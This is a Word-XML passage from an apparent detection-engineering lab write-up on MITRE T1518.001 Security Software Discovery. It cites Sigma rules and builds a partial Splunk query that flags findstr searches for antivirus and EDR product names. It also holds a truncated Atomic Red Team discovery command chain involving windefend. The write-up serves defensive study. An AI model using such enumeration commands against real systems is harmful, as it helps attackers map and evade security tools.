      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>windefend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; powershell.exe /c ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="0C097E05" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Source:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="63343E76" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">This is </w:t>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>how the ART test chains all commands</w:t>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> into one execution. Even though they show up as individual lines, they were probably run </w:t>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>as a single string in cmd.exe /c</w:t>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="4040A42C" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="2322EB11" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="06B45F0D" w14:textId="23616A80">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc193890123" w:id="7"/>
      <w:r>
        <w:t>3.3 Detection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="2E24B586" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="0CED2BF7" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">There are several ways the Security Software Discovery technique can be carried out on a system. In some environments you may want to catch only the enumeration or the tools your organization has implemented, or you may want to detect the enumeration of any tools, even if they’re not present. </w:t>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="01BC67BE" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">From MITRE “Adversaries may use the information from </w:t>
      </w:r>
      <w:hyperlink w:history="1" r:id="rId7">
        <w:r w:rsidRPr="0081210C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          </w:rPr>
          <w:t>Security Software Discovery</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="33E4A2AA" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="654127E7" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>detection.fyi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> there are a few sigma rules for detection of 1518.001 on windows hosts:</w:t>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="0FA4B917" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>“Detects calls to "get-process" where the output is piped to a "where-object" filter to search for security solution processes.”</w:t>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink w:history="1" r:id="rId8">
        <w:r w:rsidRPr="0081210C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          </w:rPr>
          <w:t>https://detection.fyi/sigmahq/sigma/windows/powershell/powershell_script/posh_ps_get_process_security_software_discovery/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="40F6D49D" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="584755D0" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>“Detects usage of "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>findstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">" with the argument "385201". Which could indicate potential discovery of an installed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Sysinternals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sysmon service using the default driver altitude (even if the name is changed).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="43B3F10B" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>references:”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="6932FCB9" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rId9">
        <w:r w:rsidRPr="0081210C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          </w:rPr>
          <w:t>https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="64163B38" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="43EAB068" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>“Detects execution of "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>findstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>" to search for common names of security tools.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="1D7E5030" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rId10">
        <w:r w:rsidRPr="0081210C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          </w:rPr>
          <w:t>https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="11D70314" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="009DCE3E" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">However! Since we have the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>yaml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the Atomic Red Team test, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>lets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> use that to generate our detection SPL query. You can view the YAML using:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="40FDC7F0" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="62EC0A7E" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">cat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>AtomicRedTeam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/atomics/T1518.001.yaml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="145B73F2" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="137BBB2C" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Selecting the commands particular to windows we can craft a query to utilize or Sysmon stream to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>splunk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="0CC83990" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="78551416" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>index=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>winsysmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> source="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>XmlWinEventLog:Microsoft</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-Windows-Sysmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/Operational"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="72F09AD5" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="1370CD8D" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="698A4A8D"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
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="795AE321" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    (Image="*\\findstr.exe" OR Image="*\\find.exe" OR </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OriginalFileName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">="FINDSTR.EXE" OR </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OriginalFileName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>="FIND.EXE")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="2EC85603" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    AND (</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="56986FA7"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 virus*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="31004D35"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cb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="739EC789"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 defender*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="2D59D871"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cylance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="6AD142B0"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 mc*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="78F83965"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>symantec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
